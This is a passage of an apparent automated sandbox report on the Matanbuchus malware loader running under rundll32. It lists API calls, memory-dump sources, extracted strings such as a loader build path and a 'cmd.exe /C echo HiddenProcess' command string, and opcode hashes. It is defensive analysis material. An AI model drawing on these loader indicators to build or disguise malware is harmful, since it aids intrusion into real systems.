                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A
                      • API String ID: 0-1298712752
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,7F3E1AB8,?,?,00000008,?,?,7F3F0FF5,00000000), ref: 7F3E1CEA
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aullrem
                      • String ID: N/A
                      • API String ID: 3758378126-2525114547
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      APIs
                      • EnumSystemLocalesW.KERNEL32(7F3EABAF,00000001,00000000,?,-00000050,?,7F3EB1E0,00000000,?,?,?,00000055,?), ref: 7F3EAAFB
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnumLocalesSystem
                      • String ID:
                      • API String ID: 2099609381-0
                      APIs
                      • EnumSystemLocalesW.KERNEL32(7F3EAE02,00000001,00000001,?,-00000050,?,7F3EB1A4,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 7F3EAB6E
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnumLocalesSystem
                      • String ID:
                      • API String ID: 2099609381-0
                      APIs
                        • Part of subcall function 7F3DF8E0: EnterCriticalSection.KERNEL32(-002B0D68,?,7F3E088A,00000000,7F4143A0,0000000C,7F3E0851,?,?,7F3E4071,?,?,7F3E253A,00000001,00000364,7F334A48), ref: 7F3DF8EF
                      • EnumSystemLocalesW.KERNEL32(7F3E42D2,00000001,7F414540,0000000C,7F3E4758,00000000), ref: 7F3E4317
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalEnterEnumLocalesSectionSystem
                      • String ID:
                      • API String ID: 1272433827-0
                      APIs
                      • EnumSystemLocalesW.KERNEL32(7F3EA997,00000001,00000001,?,?,7F3EB202,-00000050,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7F3EAA75
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnumLocalesSystem
                      • String ID:
                      • API String ID: 2099609381-0
                      APIs
                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7F3E3948,?,20001004,00000000,00000002,?,?,7F3E2F4A), ref: 7F3E4890
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoLocale
                      • String ID:
                      • API String ID: 2299586839-0
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aullrem
                      • String ID: N/A
                      • API String ID: 3758378126-2525114547
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aullrem
                      • String ID: N/A
                      • API String ID: 3758378126-2525114547
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: N/A
                      • API String ID: 0-2525114547
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: N/A
                      • API String ID: 0-2525114547
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                      • Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
                      • Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                      • Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv__aullrem
                      • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                      • API String ID: 3839614884-178659603
                      • Opcode ID: 1479719429c448d7f36a0a22b0cae36674d047b903dcaed469b44792120b88fd
                      • Instruction ID: c79e6aa8b287efc806f2a380c8c178e1b792544a36ea8b8d2d7daabfe3945d90
                      • Opcode Fuzzy Hash: 1479719429c448d7f36a0a22b0cae36674d047b903dcaed469b44792120b88fd
                      • Instruction Fuzzy Hash: 2CE1AF78E01219DFDB14CFA8C981B9DBBB1BF88344F2081AAD919AB354D7346A85CF54
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D050000, based on PE: true
                      • Associated: 0000000E.00000002.3112985616.000000006D050000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113314542.000000006D0B7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113414397.000000006D0CF000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113626125.000000006D422000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113699130.000000006D536000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113756208.000000006D537000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_6d050000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ActiveLastPopuplstrlen
                      • String ID: <$D$MATCHING_SDB_CAPAB$X$]j$cmd.exe /C echo HiddenProcess$|
                      • API String ID: 1743666984-3420354877
                      • Opcode ID: c0c233db12286b8a89b61c47b4075d657a10c685ed18ffb983ea6bdd3e917307
                      • Instruction ID: e0bdf20ab265fa7f27d902f7a47c58469db87c3ac7e684fd239b0fb3a1ed176b
                      • Opcode Fuzzy Hash: c0c233db12286b8a89b61c47b4075d657a10c685ed18ffb983ea6bdd3e917307
                      • Instruction Fuzzy Hash: 47D124B4905258CBDF24CFA9C8847ADBBB5FF8A310F10819AE848A7391D7745A80CF56
                      APIs
                      • GetUserDefaultLangID.KERNEL32 ref: 6D090D61
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D050000, based on PE: true
                      • Associated: 0000000E.00000002.3112985616.000000006D050000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113314542.000000006D0B7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113414397.000000006D0CF000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113626125.000000006D422000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113699130.000000006D536000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113756208.000000006D537000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_6d050000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: DefaultLangUser
                      • String ID: 5$<$Software\MyApp\TempKey$X$]j$|
                      • API String ID: 768647712-2233507234
                      • Opcode ID: 16b69dcb81890ab1e65b83ff5862f4505f0c87b587f23717f3f0ee6efc51821a
                      • Instruction ID: 7360120ba36b0d6ab534e554498764115f35b486b6f2fbb8493610fe30953fca
                      • Opcode Fuzzy Hash: 16b69dcb81890ab1e65b83ff5862f4505f0c87b587f23717f3f0ee6efc51821a
                      • Instruction Fuzzy Hash: B991F374D06368CBEB24CFA9C840B9DBBB5FF4A704F10819AE908A7391D3741A85CF56
                      APIs
                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,7F3F03FF), ref: 7F3F0AAC
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: 082881fae31d1f2e8ca9efff1df7ad96a6a880bf707eaeb888c5f1c063c257b4
                      • Instruction ID: c7a9b411564f4a988f16078b79ece90450963770e85a5f9862ea3acdd19b374d
                      • Opcode Fuzzy Hash: 082881fae31d1f2e8ca9efff1df7ad96a6a880bf707eaeb888c5f1c063c257b4
                      • Instruction Fuzzy Hash: D15169B990061ACBCB018FADD9885EDBFF8FF45314F904149EC83AF258C7759A258B54
                      APIs
                      • GetModuleHandleA.KERNEL32(comdlg32), ref: 7F3627FC
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: HandleModule
                      • String ID: 4A$APPLY_ALL_SHIMS$P$comdlg32
                      • API String ID: 4139908857-658474614
                      • Opcode ID: 4c2e58f4092fca5b465284512e74bdd03b4ad50ca77ffcdcd6af2eb94fbfed9f
                      • Instruction ID: 17fa358f23440e5f937b09e8fc39b159d9b749cb8f583fcdcb888909f06af4f5
                      • Opcode Fuzzy Hash: 4c2e58f4092fca5b465284512e74bdd03b4ad50ca77ffcdcd6af2eb94fbfed9f
                      • Instruction Fuzzy Hash: CC128F7A905224DFDB14CFAAC990BADBFF1FB48321F28815EE409A7245D3349990CF64
                      APIs
                      • GetModuleHandleA.KERNEL32(comdlg32), ref: 7F3627FC
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: HandleModule
                      • String ID: 4A$APPLY_ALL_SHIMS$O$comdlg32
                      • API String ID: 4139908857-4053425171
                      • Opcode ID: 22aad6b597c6a1335edb31e2edf4a3118f28b68590b1e4877ca35d7a1d921ced
                      • Instruction ID: 7da8a0ed26c07de2e97515089677d65ff971ce876b8d057965746a743e9d043e
                      • Opcode Fuzzy Hash: 22aad6b597c6a1335edb31e2edf4a3118f28b68590b1e4877ca35d7a1d921ced
                      • Instruction Fuzzy Hash: 7F128D79901228DFDB14CF6AC9907ADBFF2FB48325F28815AE409A7346D3349990CF65
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 6D0AB777
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6D0AB77F
                      • _ValidateLocalCookies.LIBCMT ref: 6D0AB808
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6D0AB833
                      • _ValidateLocalCookies.LIBCMT ref: 6D0AB888
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D050000, based on PE: true
                      • Associated: 0000000E.00000002.3112985616.000000006D050000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113314542.000000006D0B7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113414397.000000006D0CF000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113626125.000000006D422000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113699130.000000006D536000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113756208.000000006D537000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_6d050000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm$csm
                      • API String ID: 1170836740-3733052814
                      • Opcode ID: 16b58d4ff41518c816ce7ce179087e4fc4be461b04e7af8678579835ed4337d9
                      • Instruction ID: 9e7b4876fcf31dcf186235feae520c6965a3c8b66d12741620733929e4a48382
                      • Opcode Fuzzy Hash: 16b58d4ff41518c816ce7ce179087e4fc4be461b04e7af8678579835ed4337d9
                      • Instruction Fuzzy Hash: 72518134A0520DAFEF00DFA8C840BAE7BF5FF45324F198199D9195B292D771DA11CB91
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: -0LRRMS$4$N$c.
                      • API String ID: 0-722310019
                      • Opcode ID: 68d5fb756ad9812aa071d14c97ea600215cba44bac1a14391202fedcf18f7bd7
                      • Instruction ID: 9577be5c7eebc7c46d9a1ada2777df422aad22d8b13bcdc98037752d3778c96a
                      • Opcode Fuzzy Hash: 68d5fb756ad9812aa071d14c97ea600215cba44bac1a14391202fedcf18f7bd7
                      • Instruction Fuzzy Hash: 20914774D04288DFEB01CFA8C884BEEBBB5AF99304F204159E549BB381D7B56A45CF61
                      APIs
                      • GetLastError.KERNEL32(00000000,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F3638A9
                      • lstrlenA.KERNEL32(?,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F363F81
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,4D4C9FA9,00000000,A24EDEF3,000980B9,?,?,?,?), ref: 7F36411A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$ErrorLast
                      • String ID: Directoryexpansion$FailedtocreateJson$h"$tFailedtoaddbootent
                      • API String ID: 2393612546-3496758782
                      • Opcode ID: 2bf7036b7fd011fe66bbba859d6fd11f1936b8fc593bbfe8aa184b183fb37bd3
                      • Instruction ID: b39793f5a66c7100b2af8866f4a73ff29b1b7ce4e0758974a4211549dd19d549
                      • Opcode Fuzzy Hash: 2bf7036b7fd011fe66bbba859d6fd11f1936b8fc593bbfe8aa184b183fb37bd3
                      • Instruction Fuzzy Hash: 1F91C2BAC04268DBDB04CF69C8507ADBFF6BB58311F28814EE445A7349D7389995CF24
                      APIs
                      • std::bad_exception::bad_exception.LIBCMTD ref: 7F3B3FAF
                      • std::bad_exception::bad_exception.LIBCMTD ref: 7F3B3FC9
                      • std::bad_exception::bad_exception.LIBCMTD ref: 7F3B3FE3
                      • std::bad_exception::bad_exception.LIBCMTD ref: 7F3B3FFD
                      Strings
                      • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F3B4019
                      • false, xrefs: 7F3B401E
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: std::bad_exception::bad_exception
                      • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                      • API String ID: 2160870905-4036550669
                      • Opcode ID: 52862a32266abc44aece405a08ecf5fb4ab3c66b2663039958427d9cdcb6656e
                      • Instruction ID: 3978792922ee5cdd4681219c5b6a9cfc2cebca8f3c1f14a7f13a8d3ff43c4a9a
                      • Opcode Fuzzy Hash: 52862a32266abc44aece405a08ecf5fb4ab3c66b2663039958427d9cdcb6656e
                      • Instruction Fuzzy Hash: B7214F72A04348EBDB04EFA4C890DFEB7B9FB84300F14869DF9516B254DB35AA16DB14
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,7F334A48,?,1AF1C1E0,?,7F3E45E9,7F334A48,7F3D0C75,7F334A48,00000000), ref: 7F3E459D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 3664257935-537541572
                      • Opcode ID: ad17a271a347cdbd696470520096833d922f680c7e647075df25063ef6cae538
                      • Instruction ID: 5324c472b88a343495912302320cbad269eff416598facb0ddc15ba708bb0dd5
                      • Opcode Fuzzy Hash: ad17a271a347cdbd696470520096833d922f680c7e647075df25063ef6cae538
                      • Instruction Fuzzy Hash: 6921847EA05325ABD7129A75DC44B8A376DAF49371F250264E916AB2C0D730F911C7E0
                      APIs
                      • GetModuleHandleA.KERNEL32(advapi32,FFFF736A,FFFFFFFF,?,B397561A,FFFFB705,00000000,901EAF8D,00000000,00000000,00000000,FFFF7D9A,FFFFFFFF,FFFFB705,00000000,FFFFB705), ref: 7F360308
                      • GetOEMCP.KERNEL32(?,?,?,FFFF7D9A,FFFFFFFF,?,-000043C9), ref: 7F360518
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: HandleModule
                      • String ID: 4A$advapi32$m$tFailedtoaddbootent
                      • API String ID: 4139908857-1105196973
                      • Opcode ID: a5c45995d68d2c54fdda485092d735e44f6f2525fdc2cc1e9e07bdcc690c6c46
                      • Instruction ID: 587b45756bbe37f32445833efeecb457d330c4880fce086f24688c12b60c3570
                      • Opcode Fuzzy Hash: a5c45995d68d2c54fdda485092d735e44f6f2525fdc2cc1e9e07bdcc690c6c46
                      • Instruction Fuzzy Hash: 43027B7A904268DFDB08CFAAC9907ADBFF5FB48321F28815ED449A7245D7349990CF60
                      APIs
                      • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7F3DF715
                      • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7F3DF727
                      • swprintf.LIBCMT ref: 7F3DF748
                      • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7F3DF785
                      Strings
                      • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7F3DF73D
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleFileHandleTypeWriteswprintf
                      • String ID: Assertion failed: %Ts, file %Ts, line %d
                      • API String ID: 2943507729-1719349581
                      • Opcode ID: f9374ef0a50c62b02c34f04595effa9e6140706b0bee2f5d1876dbb0551a2bdb
                      • Instruction ID: 60bfc5ded175526e9e6c92212af707bc432b6c2463ca8662179d9ea31d93ce81
                      • Opcode Fuzzy Hash: f9374ef0a50c62b02c34f04595effa9e6140706b0bee2f5d1876dbb0551a2bdb
                      • Instruction Fuzzy Hash: 2011047B9002186BCB109F39CC84AEF77BDEF45360F544698FA2697144EA30AD468B64
                      APIs
                      • GetLastError.KERNEL32(00000000,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F3638A9
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast
                      • String ID: Directoryexpansion$FailedtocreateJson
                      • API String ID: 1452528299-3689221051
                      • Opcode ID: fb7d3160588e3f22cbd3e662140f6532f1ab064fffcf6aac165cb8e691b07b54
                      • Instruction ID: 306d683fe49c84282cde3b2f16eee86403b401b1763156c6b23870aed6823c0d
                      • Opcode Fuzzy Hash: fb7d3160588e3f22cbd3e662140f6532f1ab064fffcf6aac165cb8e691b07b54
                      • Instruction Fuzzy Hash: 8CD1AC79D05228DBDB14CF6AC4903ADBFF6FB48321F28819AD409A7345E7389995CF20
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Directoryexpansion$FailedtocreateJson$tFailedtoaddbootent
                      • API String ID: 0-969224555
                      • Opcode ID: fbff084666e8271f81fa954a538d381bf96de820687ea821a0250cd88587783d
                      • Instruction ID: ccc396bf8f8cff137d986b231840abb7cf7960fdb8b62f61745940d7a29b3025
                      • Opcode Fuzzy Hash: fbff084666e8271f81fa954a538d381bf96de820687ea821a0250cd88587783d
                      • Instruction Fuzzy Hash: 7C617D79D05228DBDB18CF69C9907ADBFF6BB48314F28819DE409A7349D7349A90CF24
                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 7F345957
                      • int.LIBCPMTD ref: 7F345970
                        • Part of subcall function 7F34AA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F34AA36
                        • Part of subcall function 7F34AA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F34AA60
                      • Concurrency::cancel_current_task.LIBCPMTD ref: 7F3459B7
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 7F345A4B
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                      • String ID:
                      • API String ID: 3053331623-0
                      • Opcode ID: 7a9ef372a09dc195453f4afd8da3dc4e5e7748b257097fa86dbd29bc7dca3deb
                      • Instruction ID: d13a71a00fceed0ac105638d056ea6685b7d417ddd2ae58aecaa5db23ee6348c
                      • Opcode Fuzzy Hash: 7a9ef372a09dc195453f4afd8da3dc4e5e7748b257097fa86dbd29bc7dca3deb
                      • Instruction Fuzzy Hash: 6541B5B5D01609DFCB05CFA8D990AEEBBF5FF48310F208259E815A7390DB346A45CBA1
                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 7F345817
                      • int.LIBCPMTD ref: 7F345830
                        • Part of subcall function 7F34AA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F34AA36
                        • Part of subcall function 7F34AA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F34AA60
                      • Concurrency::cancel_current_task.LIBCPMTD ref: 7F345877
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 7F34590B
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                      • String ID:
                      • API String ID: 3053331623-0
                      • Opcode ID: d5d95942f72178c9d750286200aa55f70e716e4532e19424f72823229b6041c6
                      • Instruction ID: 66573f1128a5e65efc9486bced6e40befd7bf403c98b52e96202d716bf4211b3
                      • Opcode Fuzzy Hash: d5d95942f72178c9d750286200aa55f70e716e4532e19424f72823229b6041c6
                      • Instruction Fuzzy Hash: 634177B5D01619DFCB04CFA8D990AEEBBF5FF48310F208259E915A7390DB346A45CBA1
                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 7F3456D7
                      • int.LIBCPMTD ref: 7F3456F0
                        • Part of subcall function 7F34AA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F34AA36
                        • Part of subcall function 7F34AA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F34AA60
                      • Concurrency::cancel_current_task.LIBCPMTD ref: 7F345737
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 7F3457CB
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                      • String ID:
                      • API String ID: 3053331623-0
